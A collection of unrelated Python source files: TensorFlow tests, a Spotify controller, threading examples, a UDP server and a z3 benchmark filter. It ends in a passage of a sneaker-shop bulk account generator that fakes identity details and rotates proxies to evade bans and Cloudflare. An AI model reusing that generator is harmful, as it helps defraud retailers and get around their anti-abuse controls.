self.assertAllEqual([export_strategy_1], old_es)
self.assertEqual(1, est.export_count)
# After reset with list, the count should increase with the number of items.
export_strategy_2 = saved_model_export_utils.make_export_strategy(
est, 'export_input_2', exports_to_keep=None)
export_strategy_3 = saved_model_export_utils.make_export_strategy(
est, 'export_input_3', exports_to_keep=None)
old_es = ex.reset_export_strategies([export_strategy_2, export_strategy_3])
ex.train_and_evaluate()
self.assertAllEqual([], old_es)
self.assertEqual(3, est.export_count)
def test_train_and_evaluate(self):
est = TestEstimator()
noop_hook = _NoopHook()
export_strategy = saved_model_export_utils.make_export_strategy(
est, 'export_input', exports_to_keep=None)
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
export_strategies=export_strategy)
ex.train_and_evaluate()
self.assertEqual(1, est.fit_count)
self.assertEqual(1, est.eval_count)
self.assertEqual(1, est.export_count)
self.assertEqual(1, len(est.monitors))
self.assertEqual([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'task': {
'type': run_config_lib.TaskType.PS,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host2:2222',
num_cores=15,
gpu_memory_fraction=0.314,)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls(
[test.mock.call().start(), test.mock.call().join()])
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
ex.test()
self.assertEqual(1, est.fit_count)
self.assertEqual(1, est.eval_count)
def test_continuous_eval_evaluates_checkpoint_once(self):
# Temporarily disabled until we figure out the threading story on Jenkins.
return
# pylint: disable=unreachable
# The TestEstimator will raise StopIteration the second time evaluate is
# called.
ex = experiment.Experiment(
TestEstimator(max_evals=1),
train_input_fn='train_input',
eval_input_fn='eval_input')
# This should not happen if the logic restricting evaluation of the same
# checkpoint works. We do need some checkpoint though, otherwise Experiment
# will never evaluate.
ex.estimator.fake_checkpoint()
# Start a separate thread with continuous eval
thread = threading.Thread(
target=lambda: ex.continuous_eval(delay_secs=0, throttle_delay_secs=0))
thread.start()
# The thread will die if it evaluates twice, and we should never evaluate
# twice since we don't write another checkpoint. Since we did not enable
# throttling, if it hasn't died after two seconds, we're good.
thread.join(2)
self.assertTrue(thread.is_alive())
# But we should have evaluated once.
count = ex.estimator.eval_count
self.assertEqual(1, count)
if __name__ == '__main__':
test.main()
|
spotify_manager.py
|
import spotipy
import datastore
from spotipy.oauth2 import SpotifyOAuth
import threading
import time
import json
class UserDevice():
__slots__ = ['id', 'name', 'is_active']
def __init__(self, id, name, is_active):
self.id = id
self.name = name
self.is_active = is_active
class UserTrack():
__slots__ = ['title', 'artist', 'album', 'uri']
def __init__(self, title, artist, album, uri):
self.title = title
self.artist = artist
self.album = album
self.uri = uri
def __str__(self):
return self.title + " - " + self.artist + " - " + self.album
class UserAlbum():
__slots__ = ['name', 'artist', 'track_count', 'uri']
def __init__(self, name, artist, track_count, uri):
self.name = name
self.artist = artist
self.uri = uri
self.track_count = track_count
def __str__(self):
return self.name + " - " + self.artist
class UserArtist():
__slots__ = ['name', 'uri']
def __init__(self, name, uri):
self.name = name
self.uri = uri
def __str__(self):
return self.name
class UserPlaylist():
__slots__ = ['name', 'idx', 'uri', 'track_count']
def __init__(self, name, idx, uri, track_count):
self.name = name
self.idx = idx
self.uri = uri
self.track_count = track_count
def __str__(self):
return self.name
class SearchResults():
__slots__ = ['tracks', 'artists', 'albums', 'album_track_map']
def __init__(self, tracks, artists, albums, album_track_map):
self.tracks = tracks
self.artists = artists
self.albums = albums
self.album_track_map = album_track_map
scope = "user-follow-read," \
"user-library-read," \
"user-library-modify," \
"user-modify-playback-state," \
"user-read-playback-state," \
"user-read-currently-playing," \
"app-remote-control," \
"playlist-read-private," \
"playlist-read-collaborative," \
"playlist-modify-public," \
"playlist-modify-private," \
"streaming"
DATASTORE = datastore.Datastore()
sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))
pageSize = 50
has_internet = False
def check_internet(request):
global has_internet
try:
result = request()
has_internet = True
except Exception as _:
print("no internet")
result = None
has_internet = False
return result
def get_playlist(id):
# TODO optimize query
results = sp.playlist(id)
tracks = []
for _, item in enumerate(results['tracks']['items']):
track = item['track']
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
return (UserPlaylist(results['name'], 0, results['uri'], len(tracks)), tracks) # return playlist index as 0 because it won't have a idx parameter when fetching directly from Spotify (and we don't need it here anyway)
def get_album(id):
# TODO optimize query
results = sp.album(id)
album = results['name']
artist = results['artists'][0]['name']
tracks = []
for _, item in enumerate(results['tracks']['items']):
tracks.append(UserTrack(item['name'], artist, album, item['uri']))
return (UserAlbum(results['name'], artist, len(tracks), results['uri']), tracks)
def get_playlist_tracks(id):
tracks = []
results = sp.playlist_tracks(id, limit=pageSize)
while(results['next']):
for _, item in enumerate(results['items']):
track = item['track']
if track is not None: # Catch case of empty playlist here
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
results = sp.next(results)
for _, item in enumerate(results['items']):
track = item['track']
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
return tracks
def get_album_tracks(id):
tracks = []
results = sp.playlist_tracks(id, limit=pageSize)
while(results['next']):
for _, item in enumerate(results['items']):
track = item['track']
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
results = sp.next(results)
for _, item in enumerate(results['items']):
track = item['track']
tracks.append(UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
return tracks
def refresh_devices():
results = sp.devices()
DATASTORE.clearDevices()
for _, item in enumerate(results['devices']):
if "Spotifypod" in item['name']:
print(item['name'])
device = UserDevice(item['id'], item['name'], item['is_active'])
DATASTORE.setUserDevice(device)
def parse_album(album):
artist = album['artists'][0]['name']
tracks = []
if 'tracks' not in album :
return get_album(album['id'])
for _, track in enumerate(album['tracks']['items']):
tracks.append(UserTrack(track['name'], artist, album['name'], track['uri']))
return (UserAlbum(album['name'], artist, len(tracks), album['uri']), tracks)
def refresh_data():
DATASTORE.clear()
results = sp.current_user_saved_tracks(limit=pageSize, offset=0)
while(results['next']):
offset = results['offset']
for idx, item in enumerate(results['items']):
track = item['track']
DATASTORE.setSavedTrack(idx + offset, UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
results = sp.next(results)
offset = results['offset']
for idx, item in enumerate(results['items']):
track = item['track']
DATASTORE.setSavedTrack(idx + offset, UserTrack(track['name'], track['artists'][0]['name'], track['album']['name'], track['uri']))
print("Spotify tracks fetched")
offset = 0
results = sp.current_user_followed_artists(limit=pageSize)
while(results['artists']['next']):
for idx, item in enumerate(results['artists']['items']):
DATASTORE.setArtist(idx + offset, UserArtist(item['name'], item['uri']))
results = sp.next(results['artists'])
offset = offset + pageSize
for idx, item in enumerate(results['artists']['items']):
DATASTORE.setArtist(idx + offset, UserArtist(item['name'], item['uri']))
print("Spotify artists fetched: " + str(DATASTORE.getArtistCount()))
results = sp.current_user_playlists(limit=pageSize)
totalindex = 0 # variable to preserve playlist sort index when calling offset loop down below
while(results['next']):
offset = results['offset']
for idx, item in enumerate(results['items']):
tracks = get_playlist_tracks(item['id'])
DATASTORE.setPlaylist(UserPlaylist(item['name'], totalindex, item['uri'], len(tracks)), tracks, index=idx + offset)
totalindex = totalindex + 1
results = sp.next(results)
offset = results['offset']
for idx, item in enumerate(results['items']):
tracks = get_playlist_tracks(item['id'])
DATASTORE.setPlaylist(UserPlaylist(item['name'], totalindex, item['uri'], len(tracks)), tracks, index=idx + offset)
totalindex = totalindex + 1
print("Spotify playlists fetched: " + str(DATASTORE.getPlaylistCount()))
results = sp.current_user_saved_albums(limit=pageSize)
while(results['next']):
offset = results['offset']
for idx, item in enumerate(results['items']):
album, tracks = parse_album(item['album'])
DATASTORE.setAlbum(album, tracks, index=idx + offset)
results = sp.next(results)
offset = results['offset']
for idx, item in enumerate(results['items']):
album, tracks = parse_album(item['album'])
DATASTORE.setAlbum(album, tracks, index=idx + offset)
print("Refreshed user albums")
results = sp.new_releases(limit=pageSize)
for idx, item in enumerate(results['albums']['items']):
album, tracks = parse_album(item)
DATASTORE.setNewRelease(album, tracks, index=idx)
print("Refreshed new releases")
refresh_devices()
print("Refreshed devices")
def play_artist(artist_uri, device_id = None):
if (not device_id):
devices = DATASTORE.getAllSavedDevices()
if (len(devices) == 0):
print("error! no devices")
return
device_id = devices[0].id
response = sp.start_playback(device_id=device_id, context_uri=artist_uri)
refresh_now_playing()
print(response)
def play_track(track_uri, device_id = None):
if (not device_id):
devices = DATASTORE.getAllSavedDevices()
if (len(devices) == 0):
print("error! no devices")
return
device_id = devices[0].id
sp.start_playback(device_id=device_id, uris=[track_uri])
def play_from_playlist(playlist_uri, track_uri, device_id = None):
print("playing ", playlist_uri, track_uri)
if (not device_id):
devices = DATASTORE.getAllSavedDevices()
if (len(devices) == 0):
print("error! no devices")
return
device_id = devices[0].id
sp.start_playback(device_id=device_id, context_uri=playlist_uri, offset={"uri": track_uri})
refresh_now_playing()
def get_now_playing():
response = check_internet(lambda: sp.current_playback())
if (not response or not response['item']):
return None
context = response['context']
track = response['item']
track_uri = track['uri']
artist = track['artists'][0]['name']
now_playing = {
'name': track['name'],
'track_uri': track_uri,
'artist': artist,
'album': track['album']['name'],
'duration': track['duration_ms'],
'is_playing': response['is_playing'],
'progress': response['progress_ms'],
'context_name': artist,
'track_index': -1,
'timestamp': time.time()
}
if not context:
return now_playing
if (context['type'] == 'playlist'):
uri = context['uri']
playlist = DATASTORE.getPlaylistUri(uri)
tracks = DATASTORE.getPlaylistTracks(uri)
if (not playlist):
playlist, tracks = get_playlist(uri.split(":")[-1])
DATASTORE.setPlaylist(playlist, tracks)
now_playing['track_index'] = next(x for x, val in enumerate(tracks)
if val.uri == track_uri) + 1
now_playing['track_total'] = len(tracks)
now_playing['context_name'] = playlist.name
elif (context['type'] == 'album'):
uri = context['uri']
album = DATASTORE.getAlbumUri(uri)
tracks = DATASTORE.getPlaylistTracks(uri)
if (not album):
album, tracks = get_album(uri.split(":")[-1])
DATASTORE.setAlbum(album, tracks)
now_playing['track_index'] = next(x for x, val in enumerate(tracks)
if val.uri == track_uri) + 1
now_playing['track_total'] = len(tracks)
now_playing['context_name'] = album.name
return now_playing
def search(query):
track_results = sp.search(query, limit=5, type='track')
tracks = []
for _, item in enumerate(track_results['tracks']['items']):
tracks.append(UserTrack(item['name'], item['artists'][0]['name'], item['album']['name'], item['uri']))
artist_results = sp.search(query, limit=5, type='artist')
artists = []
for _, item in enumerate(artist_results['artists']['items']):
artists.append(UserArtist(item['name'], item['uri']))
album_results = sp.search(query, limit=5, type='album')
albums = []
album_track_map = {}
for _, item in enumerate(album_results['albums']['items']):
album, album_tracks = parse_album(item)
albums.append(album)
album_track_map[album.uri] = album_tracks
return SearchResults(tracks, artists, albums, album_track_map)
def refresh_now_playing():
DATASTORE.now_playing = get_now_playing()
def play_next():
global sleep_time
sp.next_track()
sleep_time = 0.4
refresh_now_playing()
def play_previous():
global sleep_time
sp.previous_track()
sleep_time = 0.4
refresh_now_playing()
def pause():
global sleep_time
sp.pause_playback()
sleep_time = 0.4
refresh_now_playing()
def resume():
global sleep_time
sp.start_playback()
sleep_time = 0.4
refresh_now_playing()
def toggle_play():
now_playing = DATASTORE.now_playing
if not now_playing:
return
if now_playing['is_playing']:
pause()
else:
resume()
def bg_loop():
global sleep_time
while True:
refresh_now_playing()
time.sleep(sleep_time)
sleep_time = min(4, sleep_time * 2)
sleep_time = 0.3
thread = threading.Thread(target=bg_loop, args=())
thread.daemon = True # Daemonize thread
thread.start()
def run_async(fun):
threading.Thread(target=fun, args=()).start()
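# Illustrative usage sketch (assumes valid Spotipy OAuth credentials are already
# configured, as SpotifyOAuth above requires):
#
#   run_async(refresh_data)        # pull the library/playlists in the background
#   time.sleep(5)
#   np = DATASTORE.now_playing     # kept fresh by the bg_loop thread above
#   if np:
#       print(np['name'], '-', np['artist'], '(', np['context_name'], ')')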
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
for k in range(0,1000001):
i+=1
def decrementingFunction():
global i
for k in range(0,1000001):
i-=1
def main():
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
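# The unsynchronised += / -= above race against each other, so the printed
# "magic number" is not guaranteed to be 0. A lock-protected variant (sketch
# only, using the standard threading.Lock) makes the result deterministic:
#
#   from threading import Thread, Lock
#   lock = Lock()
#   n = 0
#   def inc():
#       global n
#       for _ in range(1000001):
#           with lock:
#               n += 1
#   def dec():
#       global n
#       for _ in range(1000001):
#           with lock:
#               n -= 1
#   t1, t2 = Thread(target=inc), Thread(target=dec)
#   t1.start(); t2.start(); t1.join(); t2.join()
#   print(n)  # always 0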
|
example.py
|
from threading import Thread
from rwmutex import RWLock
from time import sleep
lock = RWLock()
shared_resource = ""
def do_writes():
global lock
global shared_resource
print("writer thread waiting for write lock")
with lock.write:
print("writer thread received write lock")
for i in range(10):
print(f"writing {i}")
shared_resource += f"{i} "
sleep(1)
print("writer thread will yield write lock")
def do_read(id):
global lock
global shared_resource
print(f"reader thread {id} waiting for read lock")
with lock.read:
print(f"reader thread {id} received read lock")
print(f"reader thread {id} found '{shared_resource}'")
print(f"reader thread {id} will yield read lock")
threads = []
writer_thread = Thread(target=do_writes, daemon=True)
writer_thread.start()
threads.append(writer_thread)
for i in range(5):
reader_thread = Thread(target=do_read, args=[i])
reader_thread.start()
threads.append(reader_thread)
for t in threads:
t.join()
|
Local.py
|
# Copyright 2007 by Tiago Antao <tiagoantao@gmail.com>. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Asynchronous local execution (DEPRECATED).
Supports multicore architectures.
"""
import threading
from Bio.PopGen.Async import Async
class Local(Async):
"""Execution on Local machine."""
def __init__(self, num_cores=1):
"""Constructor.
parameters:
- num_cores - Number of cores (for multiprocessor machines,
multiply accordingly)
"""
Async.__init__(self)
self.num_cores = num_cores
self.cores_used = 0
def _run_program(self, id, hook, parameters, input_files):
"""Run program.
For parameters, please check Async.run_program.
Either runs a program if a core is available or
schedules it.
"""
self.access_ds.acquire()
self.waiting.append((id, hook, parameters, input_files))
if self.cores_used < self.num_cores:
self.cores_used += 1
threading.Thread(target=self.start_work).start()  # launch the worker on its own thread
self.access_ds.release()
def start_work(self):
"""Starts work.
Thread initial point.
While there are tasks to be done, runs them.
The thread dies as soon as there is nothing waiting to be
executed.
"""
self.access_ds.acquire()
while (len(self.waiting) > 0):
id, hook, parameters, input_files = self.waiting[0]
del self.waiting[0]
self.running[id] = True
self.access_ds.release()
ret_code, output_files = hook.run_job(parameters, input_files)
self.access_ds.acquire()
del self.running[id]
self.done[id] = ret_code, output_files
self.cores_used -= 1
self.access_ds.release()
|
udp_server.py
|
import socketserver
import threading
class serverUDP:
message = ''
class MyUDPHandler(socketserver.DatagramRequestHandler):
def handle(self):
self.wfile.write(serverUDP.message.encode())
def __init__(self, server_ip, server_port):
self.server_port = server_port
self.server_IP = server_ip
self.serverAddress = (server_ip, server_port)
self.serverUDP = socketserver.UDPServer(self.serverAddress, self.MyUDPHandler)
self.notification_thread = threading.Thread(target=self.serverUDP.serve_forever)
self.notification_thread.start()
def update_message(self, message):
serverUDP.message = message
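# ---------------------------------------------------------------------------
# Hedged usage sketch (editor addition; the address and message below are
# made-up example values): start the notification server, publish a message,
# then query it once with a plain UDP socket. Any datagram, even an empty
# one, makes the handler reply with the current message.
if __name__ == "__main__":
    import socket

    server = serverUDP("127.0.0.1", 9999)
    server.update_message("hello from serverUDP")

    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client:
        client.settimeout(2.0)
        client.sendto(b"", ("127.0.0.1", 9999))
        reply, _ = client.recvfrom(4096)
        print(reply.decode())

    server.serverUDP.shutdown()  # stop serve_forever() so the thread can exit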
|
filter_long_models.py
|
#!/usr/bin/python3
import os, subprocess
from multiprocessing import Process, Semaphore
# https://stackoverflow.com/questions/32855812/create-a-compress-function-in-python
def compress(string):
if string == '': return ''
res = ""
count = 1
# Add in first character
res += string[0]
# Iterate through loop, skipping last one
for i in range(len(string)-1):
if string[i] == string[i+1]:
count += 1
else:
# if count > 1:
# # Ignore if no repeats
# res += str(count)
res += string[i+1]
count = 1
# print last one
# if count > 1:
# res += str(count)
return res
def move_file(file):
if os.path.exists(file):
try:
p = subprocess.run(f"~/z3-4.8.12 {file} -model", shell=True, capture_output=True, executable='/bin/bash', timeout=60)
temp_str = ''
max_str = ''
max_length = 0
for ch in str(p.stdout):
if ch == '"':
if temp_str == '':
temp_str += ch
else:
assert temp_str.startswith('"')
temp_str = compress(temp_str[1:])
if len(temp_str) > max_length:
max_str = temp_str
max_length = len(temp_str)
temp_str = ''
elif temp_str != '':
temp_str += ch
assert temp_str == ''
if max_length > 6:
os.system(f'mv {file} benchmark_long_sat/')
else:
os.system(f'cp {file} benchmark_current_bugs/')
print(file, max_length, max_str)
except subprocess.TimeoutExpired as e:
print(file, e.timeout)
os.system(f'cp {file} benchmark_current_bugs/')
semaphore = Semaphore(256)
def one_function(file):
semaphore.acquire()
move_file(file)
# print(','.join(result_list))
semaphore.release()
p = subprocess.run(f"cat statistics/b79257b4e94d7c5a19686b408fa076f0c99418f3_large_10.csv | grep _sat | grep ,unsat | cut -d, -f1", shell=True, capture_output=True, executable='/bin/bash')
try:
for file in map(lambda x: x.decode('utf-8'), p.stdout.splitlines()):
semaphore.acquire(); semaphore.release()
t = Process(target=one_function, args=(file,))
t.start()
except Exception as e:
print(e)
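# Draining the semaphore: re-acquiring all 256 permits only completes once the
# spawned processes have released theirs, so this loop acts as a rough
# "wait for all children" (not airtight if a child has started but has not yet
# acquired its permit).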
for i in range(256):
semaphore.acquire()
|
soleboxaccgen.py
|
#### made by: rtuna#4321 | @rTunaboss
#### Working on Python 3.8.0
print(r'''
____ ____ _ _ ______ __ __ _
| _ \ / __ \ | \ | ||___ / /\ \ \ / /(_)
| |_) || | | || \| | / / / \ \ \_/ / _ ___
| _ < | | | || . ` | / / / /\ \ \ / | | / _ \
| |_) || |__| || |\ | / /__ / ____ \ | | _ | || (_) |
|____/ \____/ |_| \_|/_____|/_/ \_\|_|(_)|_| \___/
''')
print(" • made by: rtuna#4321 | @rTunaboss")
print(" • for personal use only")
print('-------------------------------------\n')
#################### Settings [Feel free to modify this] ####################
how_many = None
# how_many = 1
while not how_many:
try:
how_many = int(input("How many accounts would you like to create?\n"))
except ValueError:
print("This is not an integer. Try again...")
jigFirstAndLast = False #or True
jigFirst = False #or True
jigPhone = True #or False
jigFirstLineAddress = True #or False
#TODO ^for some reason if you set this to False, the account generation stops working (Fake Success)
jigSecondLineAddress = True #or False
#TODO Also make sure you fill in everything in the userdata.json file.
#-------------------------------- DO NOT MODIFY THE CODE BELOW UNLESS YOU KNOW WHAT YOU'RE DOING --------------------------------#
#################### Importing necessary libraries ####################
try:
import requests
from bs4 import BeautifulSoup as bs
from names import get_first_name, get_last_name
import random
import time
import datetime
import threading
import cfscrape
import json
import os
from colorama import Fore, Style, init
from discord_webhook import DiscordWebhook, DiscordEmbed
except:
print('[FATAL ERROR] -> "Some dependencies are not installed."')
print('!!! Make sure you read and do EVERYTHING in the "Before running" section of the README.md file on Github !!!')
print('Available from:\thttps://github.com/rtunaboss/SoleboxAccountGenerator')
input()
quit()
init(autoreset=True)
class logger:
print_lock = threading.Lock()
#################### Defining non-account specific functions ####################
def gettime():
now = str(datetime.datetime.now())
now = now.split(' ')[1]
threadname = threading.currentThread().getName()
threadname = str(threadname).replace('Thread', 'Task')
now = '[' + str(now) + ']' + ' ' + '[' + str(threadname) + ']'
return now
def send_webhook(webhook_url, email, passwd):
hook = DiscordWebhook(url=webhook_url, username="rTuna's Solebox Gen", avatar_url='https://avatars1.githubusercontent.com/u/38296319?s=460&v=4')
color=15957463
embed = DiscordEmbed(
title = 'Account successfully created!',
color=color,
url='https://github.com/rtunaboss/SoleboxAccountGenerator',
)
embed.set_footer(text=f'BONZAY Solebox • {datetime.datetime.now().strftime("%Y-%m-%d %H:%M")}',icon_url='https://cdn.discordapp.com/attachments/527830358767566848/622854816120569887/Bonzay.png')
embed.add_embed_field(name='Username', value=f'{email}')
embed.add_embed_field(name='Password', value=f'||{passwd}||', inline=False)
hook.add_embed(embed)
hook.execute()
def loadProxyUserPass(filename):
global proxyList
with open(filename + '.txt') as f:
file_content = f.read()
file_rows = file_content.split('\n')
for i in range(0, len(file_rows)):
if ':' in file_rows[i]:
tmp = file_rows[i]
tmp = tmp.split(':')
proxies = {'http': 'http://' + tmp[2] + ':' + tmp[3] + '@' + tmp[0] + ':' + tmp[1] + '/',
'https': 'http://' + tmp[2] + ':' + tmp[3] + '@' + tmp[0] + ':' + tmp[1] + '/'}
proxyList.append(proxies)
def loadProxyIpAuth(filename):
with open(filename + '.txt') as f:
file_content = f.read()
tmp = file_content.split('\n')
for n in range(0, len(tmp)):
if ':' in tmp[n]:
temp = tmp[n]
proxies = {'http': 'http://' + temp, 'https': 'http://' + temp}
proxyList.append(proxies)
def saveEmail(email, passwd):
with open('valid_emails.txt', 'a') as f:
f.write(f'{email}:{passwd}\n')
def saveNoShipEmail(email, passwd):
with open('no_ship_addy_emails.txt', 'a') as f:
f.write(f'{email}:{passwd}\n')
def getStoken(s):
try:
with logger.print_lock:
print(gettime() + ' [STATUS] -> Trying to scrape stoken...')
index_url = 'https://www.solebox.com/en/my-account/'
index_r = s.get(url=index_url, headers=headers)
if 'captcha.js' in index_r.text:
print(Fore.RED + gettime() + ' [ERROR] -> Encountered Cloudflare.')
return
if index_r.status_code == 200:
soup = bs(index_r.text, 'lxml')
stoken = soup.find('input', {'name': 'stoken'})['value']
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + f' [SUCCESS] -> Successfully scraped stoken: {stoken} !')
return stoken
else:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> Bad request. Status code %d, unable to get stoken...' % index_r.status_code)
return
except:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> Unable to get stoken.')
def scrapeCountryIds():
country_data = {}
with logger.print_lock:
print(gettime() + ' [STATUS] -> Scraping country IDs...')
s = cfscrape.create_scraper()
r = s.get(url='https://www.solebox.com/', headers=headers)
soup = bs(r.text, 'lxml')
countrySelection = soup.find('select', {'id':'invCountrySelect'})
countryValues = countrySelection.contents
for val in countryValues:
# scraped info is separated by newlines, which we want to skip
if val == '\n':
continue
else:
country_id = val['value']
country_name = val.text
country_data[country_name] = country_id
with open('countrydata.json', 'w') as f:
json.dump(country_data, f)
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + ' [SUCCESS] -> Country IDs scraped!')
def getCountryId(country_name):
with open('countrydata.json', 'r') as f:
country_data = json.loads(f.read())
try:
country_id = country_data[country_name]
return country_id
except:
print(Fore.RED + gettime() + ' [ERROR] -> Error getting country_id, check your country name in userdata.json!')
#################### Loading data and initializing other later used variables ####################
with open('useragents.txt', 'r') as f:
# with open('commonagents.txt', 'r') as f:
useragents = f.read()
useragents = useragents.split('\n')
with open('userdata.json', 'r') as f:
userData = json.loads(f.read())
webhook_url = userData['webhook_url']
firstName = userData['firstName']
if firstName == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your firstName!')
input()
quit()
lastName = userData['lastName']
if lastName == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your lastName!')
input()
quit()
phoneNum = userData['phoneNum']
if phoneNum == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your phoneNum!')
input()
quit()
passwd = userData['passwd']
if passwd == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your passwd!')
input()
quit()
addyFirstLine = userData['addyFirstLine']
if addyFirstLine == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your addyFirstLine!')
input()
quit()
houseNum = userData['houseNum']
if houseNum == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your houseNum!')
input()
quit()
zipcode = userData['zipcode']
if zipcode == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your zipcode!')
input()
quit()
city = userData['city']
if city == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your city!')
input()
quit()
country_name = userData['country_name']
if country_name == '':
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your userdata.json, you forgot to fill in your country_name!')
input()
quit()
stateUS = userData['stateUS']
if len(stateUS) > 2:
with logger.print_lock:
print(gettime() + ' [ERROR] -> Check your State settings! Correct formatting: "NY" or "TX"')
addySecondLine = userData['addySecondLine']
catchall = userData['catchall']
if catchall == '':
catchall = 'gmail.com'
if '@' in catchall:
catchall = catchall.replace('@', '')
country_id = getCountryId(country_name)
if country_id == None:
input()
quit()
headers = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8,cs;q=0.7,de;q=0.6',
# 'cache-control': 'max-age=0',
'content-type':'application/x-www-form-urlencoded',
'upgrade-insecure-requests': '1',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'none',
'sec-fetch-user': '?1',
}
linetwolist = ['apt', 'apartment', 'dorm', 'suite', 'unit', 'house', 'unt', 'room', 'floor']
#################### Main function ####################
def generateAccount():
########## Initializing a session & getting stoken ##########
useragent = random.choice(useragents)
headers['user-agent'] = useragent
# headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0'
with logger.print_lock:
print(gettime() + ' [STATUS] -> Account generation has started...')
# s = cfscrape.create_scraper()
s = requests.Session()
if proxyList:
proxy_is_bad = True
while proxy_is_bad:
s.proxies = random.choice(proxyList)
with logger.print_lock:
print(gettime() + ' [STATUS] -> Checking proxy...')
test = s.get('https://www.solebox.com/', headers=headers)
if test.status_code in (302, 200):
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + ' [SUCCESS] -> Proxy working...')
proxy_is_bad = False
elif 'captcha.js' in test.text:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> Encountered Cloudflare, rotating proxy...')
else:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> Proxy banned, rotating proxy...')
time.sleep(1)
stoken = getStoken(s)
if stoken is None:
return
time.sleep(1)
s.get(url='https://www.solebox.com/en/open-account/', headers=headers)
########## Jigging info ##########
global firstName, lastName, phoneNum, jiggedFirstLineAddress, jiggedSecondLineAddress
if jigFirstAndLast:
firstName = get_first_name()
lastName = get_last_name()
elif jigFirst:
firstName = get_first_name()
if jigPhone:
phoneNum = f'+1{random.randint(300,999)}{random.randint(300,999)}{random.randint(300,999)}'
if jigFirstLineAddress:
jiggedFirstLineAddress = f'{2*(chr(random.randint(97,97+25)).upper() + chr(random.randint(97,97+25)).upper())} {addyFirstLine}'
else:
jiggedFirstLineAddress = addyFirstLine
if jigSecondLineAddress:
jiggedSecondLineAddress = f'{random.choice(linetwolist)} {random.randint(1,20)}{chr(random.randint(97,97+25)).upper()}'
else:
jiggedSecondLineAddress = addySecondLine
email = f'{get_first_name()}{random.randint(1,9999999)}@{catchall}'
time.sleep(0.5)
with logger.print_lock:
print(gettime() + ' [STATUS] -> Trying to create an account...')
########## Configuring payload for registering and POSTing it to create an account ##########
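# (Editor note, hedged) The stoken value and the invadr[oxuser__*] /
# deladr[oxaddress__*] field names below follow the registration form of the
# OXID eShop storefront that solebox.com appears to run; stoken acts as the
# shop's per-session CSRF token.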
register_payload = {
'stoken': stoken,
'lang': '1',
'listtype': '',
'actcontrol': 'register',
'fnc': 'registeruser',
'cl': 'register',
'lgn_cook' : 0,
'reloadaddress': '',
'blshowshipaddress': 1,
'option' : 3,
'invadr[oxuser__oxsal]': random.choice(['MR', 'MRS']), # MR OR MRS
'invadr[oxuser__oxfname]': firstName,
'invadr[oxuser__oxlname]': lastName,
'invadr[oxuser__oxstreet]': jiggedFirstLineAddress,
'invadr[oxuser__oxstreetnr]': houseNum,
'invadr[oxuser__oxaddinfo]': jiggedSecondLineAddress,
'invadr[oxuser__oxzip]': zipcode,
'invadr[oxuser__oxcity]': city,
'invadr[oxuser__oxcountryid]': country_id,
'invadr[oxuser__oxstateid]': stateUS,
